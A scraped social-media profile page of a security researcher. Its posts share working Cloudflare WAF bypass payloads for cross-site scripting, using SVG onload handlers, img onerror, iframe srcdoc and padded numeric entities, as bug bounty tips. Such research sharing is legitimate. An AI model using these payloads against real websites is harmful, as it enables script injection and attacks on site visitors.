Anton Korzhynskyi
@tohasec
Security researcher from lovely Ukraine 💙💛
คุณอาจชื่นชอบ
New Cloudflare XSS Bypass: <svg/OnLoad="`${prompt``}`"> Proof: waf.cumulusfire.net/xss?globalHtml… A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase. #WAF #XSS #BugBounty #BugBountyTip
Шановні @the_prozorro та @HackenProof! Я та @page_1337 хочемо передати винагороду за найдені вразливості на #hackprozorro відразу на благодійність дітям, наприклад через blago.privatbank.ua Що для цього потрібно?
My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip
Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip
Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip
United States เทรนด์
- 1. Thanksgiving 2.35M posts
- 2. Packers 62.9K posts
- 3. Dan Campbell 6,855 posts
- 4. #GoPackGo 10.7K posts
- 5. Wicks 11K posts
- 6. Jordan Love 15.7K posts
- 7. Micah Parsons 11K posts
- 8. Goff 11.2K posts
- 9. Jack White 9,310 posts
- 10. McDuffie 2,850 posts
- 11. Kenneth Murray N/A
- 12. Watson 15.5K posts
- 13. #ChiefsKingdom 3,675 posts
- 14. Kelce 11.1K posts
- 15. Caleb Wilson 1,056 posts
- 16. #GBvsDET 4,732 posts
- 17. Green Bay 8,886 posts
- 18. Jamo 5,179 posts
- 19. Thankful 484K posts
- 20. #KCvsDAL 2,762 posts
คุณอาจชื่นชอบ
-
Walid Hossain
@walidhossain_ -
Youssef Sammouda (sam0)
@samm0uda -
💫
@umr4n6 -
Bogdan Bodisteanu
@xalerafera -
Alex Birsan
@alxbrsn -
Fisher
@Regala_ -
Rudra Sarkar
@rudr4_sarkar -
Wolfdroid
@ShMalav -
Imran Parray
@imranparray101 -
Harshad Gaikwad
@H4rSh4D -
Sharan Panegav
@PanegavSharan -
Saqib Chand 🇵🇸
@sakyb7 -
Vijith Vellora
@vijithvellora -
(((gamliel)))
@Gamliel_InfoSec -
Mohamed Haron
@m7mdharon
Something went wrong.
Something went wrong.